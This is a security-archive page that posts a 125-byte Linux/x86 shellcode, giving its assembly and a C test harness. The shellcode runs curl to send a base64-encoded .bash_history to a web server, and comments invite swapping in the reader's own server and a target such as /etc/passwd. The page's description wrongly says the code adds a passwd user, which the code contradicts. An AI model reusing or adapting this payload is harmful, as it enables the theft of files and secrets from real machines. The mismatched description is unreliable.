Linux/x86 Cat / Encode / POST Shellcode

Linux/x86 Cat / Encode / POST Shellcode: Posted Apr 15, 2019; Authored by strider; 125 bytes small Linux/x86 cat file encode to base64 and post via curl to webserver shellcode.; tags | x86, shellcode; systems | linux; SHA-256 | 2919240ee9666114771f7201d4f70cd1483e03a840365e658c60c14e1af48c2c; Download | Favorite | View

Linux/x86 Cat / Encode / POST Shellcode

 Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
# Google Dork: None
# Date: 11.04.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 125
------------------------------[Description]---------------------------------

This shellcode writes a new user to the given passwd file

Username = sshd
password = root
Shell = sh

-----------------------------[Shellcode Dump]---------------------------------
section .text

global _start

_start:
  xor eax, eax
  push eax
  jmp short _cmd

_build:
  pop ecx
  mov edi, ecx
  xor ecx, ecx
  push eax
  push 0x68732f6e
  push 0x69622f2f

_param:
  mov ebx, esp
  push eax
  push word 0x632d
  mov esi, esp

_exec:
  push eax
  push edi
  push esi
  push ebx

  mov ecx, esp
  mov al, 11
  int 0x80

_cmd:
  call _build
  msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
  ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
  ;change url to your server
  ; change file to you target file like /etc/passwd


 -----------------------------[Compile]---------------------------------------------
 gcc -m32 -fno-stack-protector -z execstack -o tester tester.c

 -----------------------------[C-Code]-----------------------------

 #include <stdio.h>
 #include <string.h>

 unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";

 void main()
 {
     printf("Shellcode Length:  %d\n", strlen(shellcode));

     int (*ret)() = (int(*)())shellcode;
     ret();
 }

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Linux/x86 Cat / Encode / POST Shellcode

Linux/x86 Cat / Encode / POST Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Linux/x86 Cat / Encode / POST Shellcode

Share This

Linux/x86 Cat / Encode / POST Shellcode

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems